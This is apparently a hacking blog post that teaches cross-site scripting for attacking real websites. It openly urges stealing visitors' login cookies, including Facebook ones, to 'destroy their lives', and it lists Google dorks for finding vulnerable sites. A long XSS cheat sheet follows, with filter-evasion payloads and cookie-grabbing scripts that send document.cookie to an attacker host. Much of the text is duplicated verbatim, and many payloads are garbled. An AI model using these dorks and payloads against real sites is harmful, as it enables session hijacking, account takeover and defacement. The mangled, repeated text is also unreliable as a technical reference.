What is Xss?
Explenation.
The full name for Xss is cross site scripting.
You can take this name literally. Because we inject right into the site/ into the inputs.
Changing/editing html. which gives us the advantage to gather user information if they click the malicious input!.cross site scripting is injecting javascript and html into the inputs of a site.
What is a cookie?
A cookie is a code that contains information for the site to know where exactly you are at the moment.
It is most likely if you have no cookie you can't stay logged in.
We use the advantage of this variable to login on that site whit there cookie.
which will give us acces to there account and more.
Its not only the current site cookie you can steal.
You can steal there facebook cookie's :D
so not only your having fun on their site.
go have fun and destroy their lives!
Different Types.
3 most seen types.
Probebly the only ones you will see.
Non persistence XSS/reflected XSS attack
This means that oure mallicious code would not be permanent.
and only appear at the time we inject it.
This is not very usefull. we want persistence XSS!
Persistence XSS/stored XSS attack
This means the mallicious code is permanent.
The output from this code will be seen by all users!
If we put a cookie stealing script in there.
It would logg all users visiting that link.
providing us whit information to log in on their accounts.
DOM-based XSS
Last but not least.
Our mallicious code will be permanent.
But however it will output different due to the type.
it outputs an unexpected result.
in some cases this cant do harm.
in other cases the code can fail.
or will be notified by an admin before you can use it.
part 2. checking xss vulnerability.
This is quite simple.
But first we need to look for a vuln one.
searching vulnerability.
We have to look for all kinds off inputs!
for example:
So, use google and look for these.
testing vulnerability.
So now we use our script in one of the inputs.
script1:
(You created a costom error saying XSS)
Somethimes admins disable the xss word or ".
or other words. we can chenge this.
script2:
(Now you creatred an error whit test obvious)
But you can also put names or other stuff.
this will output my name.
part 3. Changing content!
insert deface page.
Redirecting to another page:
insert text or images.
images.
plain text
Dorks to find xss vuln sites (I searched google for these):
for persistent:
Explenation.
The full name for Xss is cross site scripting.
You can take this name literally. Because we inject right into the site/ into the inputs.
Changing/editing html. which gives us the advantage to gather user information if they click the malicious input!.cross site scripting is injecting javascript and html into the inputs of a site.
What is a cookie?
A cookie is a code that contains information for the site to know where exactly you are at the moment.
It is most likely if you have no cookie you can't stay logged in.
We use the advantage of this variable to login on that site whit there cookie.
which will give us acces to there account and more.
Its not only the current site cookie you can steal.
You can steal there facebook cookie's :D
so not only your having fun on their site.
go have fun and destroy their lives!
Different Types.
3 most seen types.
Probebly the only ones you will see.
Non persistence XSS/reflected XSS attack
This means that oure mallicious code would not be permanent.
and only appear at the time we inject it.
This is not very usefull. we want persistence XSS!
Persistence XSS/stored XSS attack
This means the mallicious code is permanent.
The output from this code will be seen by all users!
If we put a cookie stealing script in there.
It would logg all users visiting that link.
providing us whit information to log in on their accounts.
DOM-based XSS
Last but not least.
Our mallicious code will be permanent.
But however it will output different due to the type.
it outputs an unexpected result.
in some cases this cant do harm.
in other cases the code can fail.
or will be notified by an admin before you can use it.
part 2. checking xss vulnerability.
This is quite simple.
But first we need to look for a vuln one.
searching vulnerability.
We have to look for all kinds off inputs!
for example:
Code:
shoutbox, searchbox, forums, comment space, blogs, login place, many more...So, use google and look for these.
testing vulnerability.
So now we use our script in one of the inputs.
script1:
Code:
<script>alert(“xss”);</script>Somethimes admins disable the xss word or ".
or other words. we can chenge this.
script2:
Code:
<script>alert('test');</script>But you can also put names or other stuff.
Code:
<script>alert("real steel");</script>part 3. Changing content!
insert deface page.
Redirecting to another page:
Code:
<script>window.open("http://www.yoursite.com/")</script>insert text or images.
images.
Code:
<img src=“image url here”></img>plain text
Code:
<b> You got own by real steel!</b> How does it happen?
It happens within the code of the webpage. Take a look at this source.
<tr><td>Name</td><td><input type="text" name="customer_name" value=""></td></tr>
As you see the value has yet to have a value and thus it is given and
received from an attacker using for example search box. In other words
data entered into the search box by the attacker is automatically
asserted to the value= in the above script. This can be manipulated for
example:
We want to add this code which would insert in a pop up box on the page displaying "XSS".
"><script>alert("XSS")</script>
If we add that to the search box of the vulnerable website and we view the page source code it now looks like this:
<tr><td>Name</td><td><input
type="text" name="customer_name"
value="<script>alert("XSS")</script>"></td></tr>
On the attackers URL browser it would look like this:
http://www.vulnXSSsite.com/search.php?q="><script>alert("XSS")</script>
This is basically what we can refer to as unsantized script being past
to the webserver through poor coding from the webmaster of the
vulnerable site. This is what XSS boils down to poorly coded script in
functions and search boxes that are not filtered and allow malicious
unsanitized code to pass through and to be displayed on the webserver. Dorks to find xss vuln sites (I searched google for these):
for persistent:
allinurl:"guestbook.php"
allinurl:"g_book.php"
allinurl:"sign_book.php"
allinurl:"g_book.php"
allinurl:"sign_book.php"
for non-persistent:
inurl:search.php?query=
inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
DIFFERENT XSS CHEATS:
'';!--"<XSS>=&{()}
'>//\\,<'>">">"*"
'); alert('XSS
<script>alert(1);</script>
<script>alert('XSS');</script>
<IMG SRC="jalert('XSS');">
<IMG SRC=jalert('XSS')>
<IMG SRC=jalert('XSS')>
<IMG SRC=jalert("XSS")>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<script src="http://www.evilsite.org/cookiegrabber.php"></script>
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=foo.png onerror=alert(/xssed/) />
<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC=\"jav	ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=jalert(String.fromCharCode(88,83,83))>
"><script>alert(0)</script>
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC=\"jalert('XSS')\">
<IMG DYNSRC=\"jalert('XSS')\">
<font style='color:expression(alert(document.cookie))'>
<img src="jalert('XSS')">
<script language="JavaScript">alert('XSS')</script>
<body onunload="jalert('XSS');">
<body onLoad="alert('XSS');"
[color=red' onmouseover="alert('xss')"]mouse over[/color]
"/></a></><img src=1.gif onerror=alert(1)>
window.alert("Bonjour !");
<div style="x:expression((window.r==1)?'':eval('r=1;
alert(String.fromCharCode(88,83,83));'))">
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
"><script alert(String.fromCharCode(88,83,83))</script>
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'">><marquee><h1>XSS</h1></marquee>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=jalert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=jalert('XSS');\">
<script>var var = 1; alert(var)</script>
<STYLE type="text/css">BODY{background:url("jalert('XSS')")}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
" onfocus=alert(document.domain) "> <"
<FRAMESET><FRAME SRC=\"jalert('XSS');\"></FRAMESET>
<STYLE>li {list-style-image: url(\"jalert('XSS')\");}</STYLE><UL><LI>XSS
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
<br size=\"&{alert('XSS')}\">
<scrscriptipt>alert(1)</scrscriptipt>
</br style=a:expression(alert())>
</script><script>alert(1)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
[color=red width=expression(alert(123))][color]
<BASE HREF="jalert('XSS');//">
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(123)</script>
<body onLoad="while(true) alert('XSS');">
'"></title><script>alert(1111)</script>
</textarea>'"><script>alert(document.cookie)</script>
'""><script language="JavaScript"> alert('X \nS \nS');</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script>
<INPUT TYPE="IMAGE" SRC="jalert('XSS');">
'></select><script>alert(123)</script>
'>"><script src = 'http://www.site.com/XSS.js'></script>
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
<SCRIPT>document.write("XSS");</SCRIPT>
a="get";b="URL";c="j";d="alert('xss');";eval(a+b+c+d);
='><script>alert("xss")</script>
<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
<body background=j'"><script>alert(navigator.userAgent)</script>></body>
">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
src="http://www.site.com/XSS.js"></script>
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
!--" /><script>alert('xss');</script>
<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>
'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
<iframe src="jalert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>
'>//\\,<'>">">"*"
'); alert('XSS
<script>alert(1);</script>
<script>alert('XSS');</script>
<IMG SRC="jalert('XSS');">
<IMG SRC=jalert('XSS')>
<IMG SRC=jalert('XSS')>
<IMG SRC=jalert("XSS")>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<script src="http://www.evilsite.org/cookiegrabber.php"></script>
<script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
<scr<script>ipt>alert('XSS');</scr</script>ipt>
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=foo.png onerror=alert(/xssed/) />
<style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
<? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
<marquee><script>alert('XSS')</script></marquee>
<IMG SRC=\"jav	ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=jalert(String.fromCharCode(88,83,83))>
"><script>alert(0)</script>
<script src=http://yoursite.com/your_files.js></script>
</title><script>alert(/xss/)</script>
</textarea><script>alert(/xss/)</script>
<IMG LOWSRC=\"jalert('XSS')\">
<IMG DYNSRC=\"jalert('XSS')\">
<font style='color:expression(alert(document.cookie))'>
<img src="jalert('XSS')">
<script language="JavaScript">alert('XSS')</script>
<body onunload="jalert('XSS');">
<body onLoad="alert('XSS');"
[color=red' onmouseover="alert('xss')"]mouse over[/color]
"/></a></><img src=1.gif onerror=alert(1)>
window.alert("Bonjour !");
<div style="x:expression((window.r==1)?'':eval('r=1;
alert(String.fromCharCode(88,83,83));'))">
<iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
"><script alert(String.fromCharCode(88,83,83))</script>
'>><marquee><h1>XSS</h1></marquee>
'">><script>alert('XSS')</script>
'">><marquee><h1>XSS</h1></marquee>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=jalert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=jalert('XSS');\">
<script>var var = 1; alert(var)</script>
<STYLE type="text/css">BODY{background:url("jalert('XSS')")}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<IMG SRC='vbscript:msgbox(\"XSS\")'>
" onfocus=alert(document.domain) "> <"
<FRAMESET><FRAME SRC=\"jalert('XSS');\"></FRAMESET>
<STYLE>li {list-style-image: url(\"jalert('XSS')\");}</STYLE><UL><LI>XSS
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
<br size=\"&{alert('XSS')}\">
<scrscriptipt>alert(1)</scrscriptipt>
</br style=a:expression(alert())>
</script><script>alert(1)</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
[color=red width=expression(alert(123))][color]
<BASE HREF="jalert('XSS');//">
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
"></iframe><script>alert(123)</script>
<body onLoad="while(true) alert('XSS');">
'"></title><script>alert(1111)</script>
</textarea>'"><script>alert(document.cookie)</script>
'""><script language="JavaScript"> alert('X \nS \nS');</script>
</script></script><<<<script><>>>><<<script>alert(123)</script>
<html><noalert><noscript>(123)</noscript><script>(123)</script>
<INPUT TYPE="IMAGE" SRC="jalert('XSS');">
'></select><script>alert(123)</script>
'>"><script src = 'http://www.site.com/XSS.js'></script>
}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
<SCRIPT>document.write("XSS");</SCRIPT>
a="get";b="URL";c="j";d="alert('xss');";eval(a+b+c+d);
='><script>alert("xss")</script>
<script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
<body background=j'"><script>alert(navigator.userAgent)</script>></body>
">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
src="http://www.site.com/XSS.js"></script>
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
!--" /><script>alert('xss');</script>
<script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
<img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
<script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>
'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
<iframe src="jalert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>
HoPe ThiS Will HeLp YOu
THAnKs.....
No comments:
Post a Comment